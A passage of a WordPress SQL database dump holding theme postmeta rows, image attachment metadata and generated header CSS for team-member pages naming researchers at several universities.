}\n}\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5:not(.resize-by-browser-width) .dt-css-grid {\n  grid-row-gap: 30px;\n  grid-column-gap: 30px;\n  grid-template-columns: repeat(auto-fill,minmax(,1fr));\n}\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5:not(.resize-by-browser-width) .dt-css-grid .double-width {\n  grid-column: span 2;\n}\n.cssgridlegacy.no-cssgrid .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5:not(.resize-by-browser-width) .dt-css-grid,\n.no-cssgridlegacy.no-cssgrid .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5:not(.resize-by-browser-width) .dt-css-grid {\n  display: flex;\n  flex-flow: row wrap;\n  margin: -15px;\n}\n.cssgridlegacy.no-cssgrid .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5:not(.resize-by-browser-width) .dt-css-grid .wf-cell,\n.no-cssgridlegacy.no-cssgrid .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5:not(.resize-by-browser-width) .dt-css-grid .wf-cell {\n  flex: 1 0 ;\n  max-width: 100%;\n  padding: 15px;\n  box-sizing: border-box;\n}\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.resize-by-browser-width .dt-css-grid {\n  grid-template-columns: repeat(3,1fr);\n  grid-template-rows: auto;\n  grid-column-gap: 30px;\n  grid-row-gap: 30px;\n}\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.resize-by-browser-width .dt-css-grid .double-width {\n  grid-column: span 2;\n}\n.cssgridlegacy.no-cssgrid .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.resize-by-browser-width .dt-css-grid {\n  margin: -15px;\n}\n.cssgridlegacy.no-cssgrid .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.resize-by-browser-width .dt-css-grid .wf-cell {\n  width: 33.333333333333%;\n  padding: 15px;\n}\n.cssgridlegacy.no-cssgrid .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.resize-by-browser-width .dt-css-grid .wf-cell.double-width {\n  width: calc(33.333333333333%) * 2;\n}\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.resize-by-browser-width:not(.centered-layout-list):not(.content-bg-on) .dt-css-grid {\n  grid-row-gap: 0px;\n}\n@media screen and (max-width: 1199px) {\n  .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.resize-by-browser-width .dt-css-grid {\n    grid-template-columns: repeat(3,1fr);\n  }\n  .cssgridlegacy.no-cssgrid .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.resize-by-browser-width .dt-css-grid .wf-cell,\n  .no-cssgridlegacy.no-cssgrid .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.resize-by-browser-width .dt-css-grid .wf-cell {\n    width: 33.333333333333%;\n  }\n  .cssgridlegacy.no-cssgrid .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.resize-by-browser-width .dt-css-grid .wf-cell.double-width,\n  .no-cssgridlegacy.no-cssgrid .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.resize-by-browser-width .dt-css-grid .wf-cell.double-width {\n    width: calc(33.333333333333%)*2;\n  }\n}\n@media screen and (max-width: 991px) {\n  .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.resize-by-browser-width .dt-css-grid {\n    grid-template-columns: repeat(2,1fr);\n  }\n  .cssgridlegacy.no-cssgrid .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.resize-by-browser-width .dt-css-grid .wf-cell,\n  .no-cssgridlegacy.no-cssgrid .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.resize-by-browser-width .dt-css-grid .wf-cell {\n    width: 50%;\n  }\n  .cssgridlegacy.no-cssgrid .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.resize-by-browser-width .dt-css-grid .wf-cell.double-width,\n  .no-cssgridlegacy.no-cssgrid .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.resize-by-browser-width .dt-css-grid .wf-cell.double-width {\n    width: calc(50%)*2;\n  }\n}\n@media screen and (max-width: 767px) {\n  .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.resize-by-browser-width .dt-css-grid {\n    grid-template-columns: repeat(1,1fr);\n  }\n  .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.resize-by-browser-width .dt-css-grid .double-width {\n    grid-column: span 1;\n  }\n  .cssgridlegacy.no-cssgrid .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.resize-by-browser-width .dt-css-grid .wf-cell,\n  .no-cssgridlegacy.no-cssgrid .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.resize-by-browser-width .dt-css-grid .wf-cell {\n    width: 100%;\n  }\n  .cssgridlegacy.no-cssgrid .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.resize-by-browser-width .dt-css-grid .wf-cell.double-width,\n  .no-cssgridlegacy.no-cssgrid .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.resize-by-browser-width .dt-css-grid .wf-cell.double-width {\n    width: calc(100%)*2;\n  }\n}\n\";}'),
(18159,2996,'_wp_page_template','default'),
(18161,2996,'_dt_microsite_primary_menu',''),
(18162,2996,'_dt_microsite_split_left_menu',''),
(18163,2996,'_dt_microsite_split_right_menu',''),
(18164,2996,'_dt_microsite_mobile_menu',''),
(18165,3025,'_edit_lock','1667935835:1'),
(18166,3026,'_wp_attached_file','2022/11/ws201.jpg'),
(18167,3026,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:140;s:6:\"height\";i:165;s:4:\"file\";s:17:\"2022/11/ws201.jpg\";s:8:\"filesize\";i:44030;s:5:\"sizes\";a:1:{s:9:\"thumbnail\";a:5:{s:4:\"file\";s:17:\"ws201-140x150.jpg\";s:5:\"width\";i:140;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:6706;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),
(18168,3025,'_thumbnail_id','3026'),
(18169,3025,'_edit_last','1'),
(18170,3025,'_dt_sidebar_position','disabled'),
(18171,3025,'_dt_sidebar_widgetarea_id','sidebar_1'),
(18172,3025,'_dt_sidebar_hide_on_mobile','0'),
(18173,3025,'_dt_footer_show','1'),
(18174,3025,'_dt_footer_widgetarea_id','sidebar_2'),
(18175,3025,'_dt_footer_hide_on_mobile','0'),
(18176,3025,'_dt_header_title','fancy'),
(18177,3025,'_dt_header_background','normal'),
(18178,3025,'_dt_header_background_below_slideshow','disabled'),
(18179,3025,'_dt_header_transparent_bg_color_scheme','light'),
(18180,3025,'_dt_header_transparent_top_bar_bg_color','#ffffff'),
(18181,3025,'_dt_header_transparent_top_bar_bg_opacity','25'),
(18182,3025,'_dt_header_transparent_bg_color','#000000'),
(18183,3025,'_dt_header_transparent_bg_opacity','50'),
(18184,3025,'_dt_header_disabled_background','normal'),
(18185,3025,'_dt_header_disabled_transparent_bg_color_scheme','light'),
(18186,3025,'_dt_header_disabled_transparent_top_bar_bg_color','#ffffff'),
(18187,3025,'_dt_header_disabled_transparent_top_bar_bg_opacity','25'),
(18188,3025,'_dt_header_disabled_transparent_bg_color','#000000'),
(18189,3025,'_dt_header_disabled_transparent_bg_opacity','50'),
(18190,3025,'_dt_page_overrides_top_margin',''),
(18191,3025,'_dt_page_overrides_right_margin',''),
(18192,3025,'_dt_page_overrides_bottom_margin',''),
(18193,3025,'_dt_page_overrides_left_margin',''),
(18194,3025,'_dt_mobile_page_padding_top',''),
(18195,3025,'_dt_mobile_page_padding_right',''),
(18196,3025,'_dt_mobile_page_padding_bottom',''),
(18197,3025,'_dt_mobile_page_padding_left',''),
(18198,3025,'_dt_fancy_header_layout_heading',''),
(18199,3025,'_dt_fancy_header_title_aligment','center'),
(18200,3025,'_dt_fancy_header_height','300'),
(18201,3025,'_dt_fancy_header_padding-top','0px'),
(18202,3025,'_dt_fancy_header_padding-bottom','0px'),
(18203,3025,'_dt_fancy_header_breadcrumbs_heading',''),
(18204,3025,'_dt_fancy_header_breadcrumbs','disabled'),
(18205,3025,'_dt_fancy_header_breadcrumbs_text_color','#ffffff'),
(18206,3025,'_dt_fancy_header_breadcrumbs_bg_color','disabled'),
(18207,3025,'_dt_fancy_header_title_heading',''),
(18208,3025,'_dt_fancy_header_title_mode','custom'),
(18209,3025,'_dt_fancy_header_title','Liang Xinlian Wuhan University, China (WGIII-1)'),
(18210,3025,'_dt_fancy_header_title_font_size','30'),
(18211,3025,'_dt_fancy_header_title_line_height','36'),
(18212,3025,'_dt_fancy_header_text_transform','none'),
(18213,3025,'_dt_fancy_header_title_color_mode','color'),
(18214,3025,'_dt_fancy_header_title_color','#ffffff'),
(18215,3025,'_dt_fancy_header_subtitle_heading',''),
(18216,3025,'_dt_fancy_header_subtitle',''),
(18217,3025,'_dt_fancy_header_subtitle_font_size','18'),
(18218,3025,'_dt_fancy_header_subtitle_line_height','26'),
(18219,3025,'_dt_fancy_header_subtitle_text_transform','none'),
(18220,3025,'_dt_fancy_header_subtitle_color_mode','color'),
(18221,3025,'_dt_fancy_header_subtitle_color','#ffffff'),
(18222,3025,'_dt_fancy_header_bg_heading',''),
(18223,3025,'_dt_fancy_header_bg_color','#222222'),
(18224,3025,'_dt_fancy_header_bg_image_origin','custom'),
(18225,3025,'_dt_fancy_header_bg_image','a:0:{}'),
(18226,3025,'_dt_fancy_header_bg_repeat','no-repeat'),
(18227,3025,'_dt_fancy_header_bg_position_x','center'),
(18228,3025,'_dt_fancy_header_bg_position_y','center'),
(18229,3025,'_dt_fancy_header_bg_fullscreen','1'),
(18230,3025,'_dt_fancy_header_bg_overlay','0'),
(18231,3025,'_dt_fancy_header_overlay_color','#000'),
(18232,3025,'_dt_fancy_header_bg_overlay_opacity','50'),
(18233,3025,'_dt_fancy_header_scroll_effect','default'),
(18234,3025,'_dt_fancy_header_bg_parallax','0.5'),
(18235,3025,'_dt_fancy_header_responsiveness_heading',''),
(18236,3025,'_dt_fancy_header_responsiveness','enabled'),
(18237,3025,'_dt_fancy_header_responsiveness_switch','778px'),
(18238,3025,'_dt_fancy_header_responsive_height','70'),
(18239,3025,'_dt_fancy_header_responsive_font_size','30'),
(18240,3025,'_dt_fancy_header_responsive_title_line_height','38'),
(18241,3025,'_dt_fancy_header_responsive_subtitle_font_size','20'),
(18242,3025,'_dt_fancy_header_responsive_subtitle_line_height','28'),
(18243,3025,'_dt_fancy_header_responsive_breadcrumbs','disabled'),
(18244,3025,'_dt_teammate_options_go_to_single','1'),
(18245,3025,'_dt_teammate_options_position',''),
(18246,3025,'_dt_teammate_options_website',''),
(18247,3025,'_dt_teammate_options_mail',''),
(18248,3025,'_dt_teammate_options_facebook',''),
(18249,3025,'_dt_teammate_options_twitter',''),
(18250,3025,'_dt_teammate_options_dribbble',''),
(18251,3025,'_dt_teammate_options_you-tube',''),
(18252,3025,'_dt_teammate_options_rss',''),
(18253,3025,'_dt_teammate_options_delicious',''),
(18254,3025,'_dt_teammate_options_flickr',''),
(18255,3025,'_dt_teammate_options_lastfm',''),
(18256,3025,'_dt_teammate_options_linkedin',''),
(18257,3025,'_dt_teammate_options_vimeo',''),
(18258,3025,'_dt_teammate_options_tumbler',''),
(18259,3025,'_dt_teammate_options_pinterest',''),
(18260,3025,'_dt_teammate_options_devian',''),
(18261,3025,'_dt_teammate_options_skype',''),
(18262,3025,'_dt_teammate_options_github',''),
(18263,3025,'_dt_teammate_options_instagram',''),
(18264,3025,'_dt_teammate_options_stumbleupon',''),
(18265,3025,'_dt_teammate_options_behance',''),
(18266,3025,'_dt_teammate_options_px-500',''),
(18267,3025,'_dt_teammate_options_tripedvisor',''),
(18268,3025,'_dt_teammate_options_vk',''),
(18269,3025,'_dt_teammate_options_foursquare',''),
(18270,3025,'_dt_teammate_options_xing',''),
(18271,3025,'_dt_teammate_options_weibo',''),
(18272,3025,'_dt_teammate_options_odnoklassniki',''),
(18273,3025,'_dt_teammate_options_research-gate',''),
(18274,3025,'_dt_teammate_options_yelp',''),
(18275,3025,'_dt_teammate_options_blogger',''),
(18276,3025,'_dt_teammate_options_soundcloud',''),
(18277,3025,'_dt_teammate_options_viber',''),
(18278,3025,'_dt_teammate_options_whatsapp',''),
(18279,3025,'_dt_teammate_options_reddit',''),
(18280,3025,'_dt_teammate_options_snapchat',''),
(18281,3025,'_dt_teammate_options_telegram',''),
(18282,3025,'the7_fancy_title_css','.fancy-header {\n  background-image: none;\n  background-repeat: no-repeat;\n  background-position: center center;\n  background-size: cover;\n  background-color: #222222;\n}\n.mobile-false .fancy-header {\n  background-attachment: scroll;\n}\n.fancy-header .wf-wrap {\n  min-height: 300px;\n  padding-top: 0px;\n  padding-bottom: 0px;\n}\n.fancy-header .fancy-title {\n  font-size: 30px;\n  line-height: 36px;\n  color: #ffffff;\n  text-transform: none;\n}\n.fancy-header .fancy-subtitle {\n  font-size: 18px;\n  line-height: 26px;\n  color: #ffffff;\n  text-transform: none;\n}\n.fancy-header .breadcrumbs {\n  color: #ffffff;\n}\n.fancy-header-overlay {\n  background: rgba(0,0,0,0.5);\n}\n@media screen and (max-width: 778px) {\n  .fancy-header .wf-wrap {\n    min-height: 70px;\n  }\n  .fancy-header .fancy-title {\n    font-size: 30px;\n    line-height: 38px;\n  }\n  .fancy-header .fancy-subtitle {\n    font-size: 20px;\n    line-height: 28px;\n  }\n  .fancy-header.breadcrumbs-mobile-off .breadcrumbs {\n    display: none;\n  }\n  #fancy-header > .wf-wrap {\n    flex-flow: column wrap;\n    align-items: center;\n    justify-content: center;\n    padding-bottom: 0px !important;\n  }\n  .fancy-header.title-left .breadcrumbs {\n    text-align: center;\n    float: none;\n  }\n  .breadcrumbs {\n    margin-bottom: 10px;\n  }\n  .breadcrumbs.breadcrumbs-bg {\n    margin-top: 10px;\n  }\n  .fancy-header.title-right .breadcrumbs {\n    margin: 10px 0 10px 0;\n  }\n  #fancy-header .hgroup,\n  #fancy-header .breadcrumbs {\n    text-align: center;\n  }\n  .fancy-header .hgroup {\n    padding-bottom: 5px;\n  }\n  .breadcrumbs-off .hgroup {\n    padding-bottom: 5px;\n  }\n  .title-right .hgroup {\n    padding: 0 0 5px 0;\n  }\n  .title-right.breadcrumbs-off .hgroup {\n    padding-top: 5px;\n  }\n  .title-left.disabled-bg .breadcrumbs {\n    margin-bottom: 0;\n  }\n}\n'),
(18283,3027,'_edit_lock','1667935847:1'),
(18284,3028,'_wp_attached_file','2022/11/ws202.jpg'),
(18285,3028,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:134;s:6:\"height\";i:165;s:4:\"file\";s:17:\"2022/11/ws202.jpg\";s:8:\"filesize\";i:38338;s:5:\"sizes\";a:1:{s:9:\"thumbnail\";a:5:{s:4:\"file\";s:17:\"ws202-134x150.jpg\";s:5:\"width\";i:134;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:6008;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),
(18286,3027,'_thumbnail_id','3028'),
(18287,3027,'_edit_last','1'),
(18288,3027,'_dt_sidebar_position','disabled'),
(18289,3027,'_dt_sidebar_widgetarea_id','sidebar_1'),
(18290,3027,'_dt_sidebar_hide_on_mobile','0'),
(18291,3027,'_dt_footer_show','1'),
(18292,3027,'_dt_footer_widgetarea_id','sidebar_2'),
(18293,3027,'_dt_footer_hide_on_mobile','0'),
(18294,3027,'_dt_header_title','fancy'),
(18295,3027,'_dt_header_background','normal'),
(18296,3027,'_dt_header_background_below_slideshow','disabled'),
(18297,3027,'_dt_header_transparent_bg_color_scheme','light'),
(18298,3027,'_dt_header_transparent_top_bar_bg_color','#ffffff'),
(18299,3027,'_dt_header_transparent_top_bar_bg_opacity','25'),
(18300,3027,'_dt_header_transparent_bg_color','#000000'),
(18301,3027,'_dt_header_transparent_bg_opacity','50'),
(18302,3027,'_dt_header_disabled_background','normal'),
(18303,3027,'_dt_header_disabled_transparent_bg_color_scheme','light'),
(18304,3027,'_dt_header_disabled_transparent_top_bar_bg_color','#ffffff'),
(18305,3027,'_dt_header_disabled_transparent_top_bar_bg_opacity','25'),
(18306,3027,'_dt_header_disabled_transparent_bg_color','#000000'),
(18307,3027,'_dt_header_disabled_transparent_bg_opacity','50'),
(18308,3027,'_dt_page_overrides_top_margin',''),
(18309,3027,'_dt_page_overrides_right_margin',''),
(18310,3027,'_dt_page_overrides_bottom_margin',''),
(18311,3027,'_dt_page_overrides_left_margin',''),
(18312,3027,'_dt_mobile_page_padding_top',''),
(18313,3027,'_dt_mobile_page_padding_right',''),
(18314,3027,'_dt_mobile_page_padding_bottom',''),
(18315,3027,'_dt_mobile_page_padding_left',''),
(18316,3027,'_dt_fancy_header_layout_heading',''),
(18317,3027,'_dt_fancy_header_title_aligment','center'),
(18318,3027,'_dt_fancy_header_height','300'),
(18319,3027,'_dt_fancy_header_padding-top','0px'),
(18320,3027,'_dt_fancy_header_padding-bottom','0px'),
(18321,3027,'_dt_fancy_header_breadcrumbs_heading',''),
(18322,3027,'_dt_fancy_header_breadcrumbs','disabled'),
(18323,3027,'_dt_fancy_header_breadcrumbs_text_color','#ffffff'),
(18324,3027,'_dt_fancy_header_breadcrumbs_bg_color','disabled'),
(18325,3027,'_dt_fancy_header_title_heading',''),
(18326,3027,'_dt_fancy_header_title_mode','custom'),
(18327,3027,'_dt_fancy_header_title','Wang Yunsheng, Finnish Geospatial Research Institute, Finland (WGI-7)'),
(18328,3027,'_dt_fancy_header_title_font_size','30'),
(18329,3027,'_dt_fancy_header_title_line_height','36'),
(18330,3027,'_dt_fancy_header_text_transform','none'),
(18331,3027,'_dt_fancy_header_title_color_mode','color'),
(18332,3027,'_dt_fancy_header_title_color','#ffffff'),
(18333,3027,'_dt_fancy_header_subtitle_heading',''),
(18334,3027,'_dt_fancy_header_subtitle',''),
(18335,3027,'_dt_fancy_header_subtitle_font_size','18'),
(18336,3027,'_dt_fancy_header_subtitle_line_height','26'),
(18337,3027,'_dt_fancy_header_subtitle_text_transform','none'),
(18338,3027,'_dt_fancy_header_subtitle_color_mode','color'),
(18339,3027,'_dt_fancy_header_subtitle_color','#ffffff'),
(18340,3027,'_dt_fancy_header_bg_heading',''),
(18341,3027,'_dt_fancy_header_bg_color','#222222'),
(18342,3027,'_dt_fancy_header_bg_image_origin','custom'),
(18343,3027,'_dt_fancy_header_bg_image','a:0:{}'),
(18344,3027,'_dt_fancy_header_bg_repeat','no-repeat'),
(18345,3027,'_dt_fancy_header_bg_position_x','center'),
(18346,3027,'_dt_fancy_header_bg_position_y','center'),
(18347,3027,'_dt_fancy_header_bg_fullscreen','1'),
(18348,3027,'_dt_fancy_header_bg_overlay','0'),
(18349,3027,'_dt_fancy_header_overlay_color','#000'),
(18350,3027,'_dt_fancy_header_bg_overlay_opacity','50'),
(18351,3027,'_dt_fancy_header_scroll_effect','default'),
(18352,3027,'_dt_fancy_header_bg_parallax','0.5'),
(18353,3027,'_dt_fancy_header_responsiveness_heading',''),
(18354,3027,'_dt_fancy_header_responsiveness','enabled'),
(18355,3027,'_dt_fancy_header_responsiveness_switch','778px'),
(18356,3027,'_dt_fancy_header_responsive_height','70'),
(18357,3027,'_dt_fancy_header_responsive_font_size','30'),
(18358,3027,'_dt_fancy_header_responsive_title_line_height','38'),
(18359,3027,'_dt_fancy_header_responsive_subtitle_font_size','20'),
(18360,3027,'_dt_fancy_header_responsive_subtitle_line_height','28'),
(18361,3027,'_dt_fancy_header_responsive_breadcrumbs','disabled'),
(18362,3027,'_dt_teammate_options_go_to_single','1'),
(18363,3027,'_dt_teammate_options_position',''),
(18364,3027,'_dt_teammate_options_website',''),
(18365,3027,'_dt_teammate_options_mail',''),
(18366,3027,'_dt_teammate_options_facebook',''),
(18367,3027,'_dt_teammate_options_twitter',''),
(18368,3027,'_dt_teammate_options_dribbble',''),
(18369,3027,'_dt_teammate_options_you-tube',''),
(18370,3027,'_dt_teammate_options_rss',''),
(18371,3027,'_dt_teammate_options_delicious',''),
(18372,3027,'_dt_teammate_options_flickr',''),
(18373,3027,'_dt_teammate_options_lastfm',''),
(18374,3027,'_dt_teammate_options_linkedin',''),
(18375,3027,'_dt_teammate_options_vimeo',''),
(18376,3027,'_dt_teammate_options_tumbler',''),
(18377,3027,'_dt_teammate_options_pinterest',''),
(18378,3027,'_dt_teammate_options_devian',''),
(18379,3027,'_dt_teammate_options_skype',''),
(18380,3027,'_dt_teammate_options_github',''),
(18381,3027,'_dt_teammate_options_instagram',''),
(18382,3027,'_dt_teammate_options_stumbleupon',''),
(18383,3027,'_dt_teammate_options_behance',''),
(18384,3027,'_dt_teammate_options_px-500',''),
(18385,3027,'_dt_teammate_options_tripedvisor',''),
(18386,3027,'_dt_teammate_options_vk',''),
(18387,3027,'_dt_teammate_options_foursquare',''),
(18388,3027,'_dt_teammate_options_xing',''),
(18389,3027,'_dt_teammate_options_weibo',''),
(18390,3027,'_dt_teammate_options_odnoklassniki',''),
(18391,3027,'_dt_teammate_options_research-gate',''),
(18392,3027,'_dt_teammate_options_yelp',''),
(18393,3027,'_dt_teammate_options_blogger',''),
(18394,3027,'_dt_teammate_options_soundcloud',''),
(18395,3027,'_dt_teammate_options_viber',''),
(18396,3027,'_dt_teammate_options_whatsapp',''),
(18397,3027,'_dt_teammate_options_reddit',''),
(18398,3027,'_dt_teammate_options_snapchat',''),
(18399,3027,'_dt_teammate_options_telegram',''),
(18400,3027,'the7_fancy_title_css','.fancy-header {\n  background-image: none;\n  background-repeat: no-repeat;\n  background-position: center center;\n  background-size: cover;\n  background-color: #222222;\n}\n.mobile-false .fancy-header {\n  background-attachment: scroll;\n}\n.fancy-header .wf-wrap {\n  min-height: 300px;\n  padding-top: 0px;\n  padding-bottom: 0px;\n}\n.fancy-header .fancy-title {\n  font-size: 30px;\n  line-height: 36px;\n  color: #ffffff;\n  text-transform: none;\n}\n.fancy-header .fancy-subtitle {\n  font-size: 18px;\n  line-height: 26px;\n  color: #ffffff;\n  text-transform: none;\n}\n.fancy-header .breadcrumbs {\n  color: #ffffff;\n}\n.fancy-header-overlay {\n  background: rgba(0,0,0,0.5);\n}\n@media screen and (max-width: 778px) {\n  .fancy-header .wf-wrap {\n    min-height: 70px;\n  }\n  .fancy-header .fancy-title {\n    font-size: 30px;\n    line-height: 38px;\n  }\n  .fancy-header .fancy-subtitle {\n    font-size: 20px;\n    line-height: 28px;\n  }\n  .fancy-header.breadcrumbs-mobile-off .breadcrumbs {\n    display: none;\n  }\n  #fancy-header > .wf-wrap {\n    flex-flow: column wrap;\n    align-items: center;\n    justify-content: center;\n    padding-bottom: 0px !important;\n  }\n  .fancy-header.title-left .breadcrumbs {\n    text-align: center;\n    float: none;\n  }\n  .breadcrumbs {\n    margin-bottom: 10px;\n  }\n  .breadcrumbs.breadcrumbs-bg {\n    margin-top: 10px;\n  }\n  .fancy-header.title-right .breadcrumbs {\n    margin: 10px 0 10px 0;\n  }\n  #fancy-header .hgroup,\n  #fancy-header .breadcrumbs {\n    text-align: center;\n  }\n  .fancy-header .hgroup {\n    padding-bottom: 5px;\n  }\n  .breadcrumbs-off .hgroup {\n    padding-bottom: 5px;\n  }\n  .title-right .hgroup {\n    padding: 0 0 5px 0;\n  }\n  .title-right.breadcrumbs-off .hgroup {\n    padding-top: 5px;\n  }\n  .title-left.disabled-bg .breadcrumbs {\n    margin-bottom: 0;\n  }\n}\n'),
(18401,3029,'_edit_lock','1668879319:1'),
(18402,3030,'_wp_attached_file','2022/11/ws203.jpg'),
(18403,3030,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:137;s:6:\"height\";i:165;s:4:\"file\";s:17:\"2022/11/ws203.jpg\";s:8:\"filesize\";i:29301;s:5:\"sizes\";a:1:{s:9:\"thumbnail\";a:5:{s:4:\"file\";s:17:\"ws203-137x150.jpg\";s:5:\"width\";i:137;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:4317;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),
(18404,3029,'_thumbnail_id','3030'),
(18405,3029,'_edit_last','1'),
(18406,3029,'_dt_sidebar_position','disabled'),
(18407,3029,'_dt_sidebar_widgetarea_id','sidebar_1'),
(18408,3029,'_dt_sidebar_hide_on_mobile','0'),
(18409,3029,'_dt_footer_show','1'),
(18410,3029,'_dt_footer_widgetarea_id','sidebar_2'),
(18411,3029,'_dt_footer_hide_on_mobile','0'),
(18412,3029,'_dt_header_title','fancy'),
(18413,3029,'_dt_header_background','normal'),
(18414,3029,'_dt_header_background_below_slideshow','disabled'),
(18415,3029,'_dt_header_transparent_bg_color_scheme','light'),
(18416,3029,'_dt_header_transparent_top_bar_bg_color','#ffffff'),
(18417,3029,'_dt_header_transparent_top_bar_bg_opacity','25'),
(18418,3029,'_dt_header_transparent_bg_color','#000000'),
(18419,3029,'_dt_header_transparent_bg_opacity','50'),
(18420,3029,'_dt_header_disabled_background','normal'),
(18421,3029,'_dt_header_disabled_transparent_bg_color_scheme','light'),
(18422,3029,'_dt_header_disabled_transparent_top_bar_bg_color','#ffffff'),
(18423,3029,'_dt_header_disabled_transparent_top_bar_bg_opacity','25'),
(18424,3029,'_dt_header_disabled_transparent_bg_color','#000000'),
(18425,3029,'_dt_header_disabled_transparent_bg_opacity','50'),
(18426,3029,'_dt_page_overrides_top_margin',''),
(18427,3029,'_dt_page_overrides_right_margin',''),
(18428,3029,'_dt_page_overrides_bottom_margin',''),
(18429,3029,'_dt_page_overrides_left_margin',''),
(18430,3029,'_dt_mobile_page_padding_top',''),
(18431,3029,'_dt_mobile_page_padding_right',''),
(18432,3029,'_dt_mobile_page_padding_bottom',''),
(18433,3029,'_dt_mobile_page_padding_left',''),
(18434,3029,'_dt_fancy_header_layout_heading',''),
(18435,3029,'_dt_fancy_header_title_aligment','center'),
(18436,3029,'_dt_fancy_header_height','300'),
(18437,3029,'_dt_fancy_header_padding-top','0px'),
(18438,3029,'_dt_fancy_header_padding-bottom','0px'),
(18439,3029,'_dt_fancy_header_breadcrumbs_heading',''),
(18440,3029,'_dt_fancy_header_breadcrumbs','disabled'),
(18441,3029,'_dt_fancy_header_breadcrumbs_text_color','#ffffff'),
(18442,3029,'_dt_fancy_header_breadcrumbs_bg_color','disabled'),
(18443,3029,'_dt_fancy_header_title_heading',''),
(18444,3029,'_dt_fancy_header_title_mode','custom'),
(18445,3029,'_dt_fancy_header_title','Francesco Pirotti University of Padova, Italy'),
(18446,3029,'_dt_fancy_header_title_font_size','30'),
(18447,3029,'_dt_fancy_header_title_line_height','36'),
(18448,3029,'_dt_fancy_header_text_transform','none'),
(18449,3029,'_dt_fancy_header_title_color_mode','color'),
(18450,3029,'_dt_fancy_header_title_color','#ffffff'),
(18451,3029,'_dt_fancy_header_subtitle_heading',''),
(18452,3029,'_dt_fancy_header_subtitle',''),
(18453,3029,'_dt_fancy_header_subtitle_font_size','18'),
(18454,3029,'_dt_fancy_header_subtitle_line_height','26'),
(18455,3029,'_dt_fancy_header_subtitle_text_transform','none'),
(18456,3029,'_dt_fancy_header_subtitle_color_mode','color'),
(18457,3029,'_dt_fancy_header_subtitle_color','#ffffff'),
(18458,3029,'_dt_fancy_header_bg_heading',''),
(18459,3029,'_dt_fancy_header_bg_color','#222222'),
(18460,3029,'_dt_fancy_header_bg_image_origin','custom'),
(18461,3029,'_dt_fancy_header_bg_image','a:0:{}'),
(18462,3029,'_dt_fancy_header_bg_repeat','no-repeat'),
(18463,3029,'_dt_fancy_header_bg_position_x','center'),
(18464,3029,'_dt_fancy_header_bg_position_y','center'),
(18465,3029,'_dt_fancy_header_bg_fullscreen','1'),
(18466,3029,'_dt_fancy_header_bg_overlay','0'),
(18467,3029,'_dt_fancy_header_overlay_color','#000'),
(18468,3029,'_dt_fancy_header_bg_overlay_opacity','50'),
(18469,3029,'_dt_fancy_header_scroll_effect','default'),
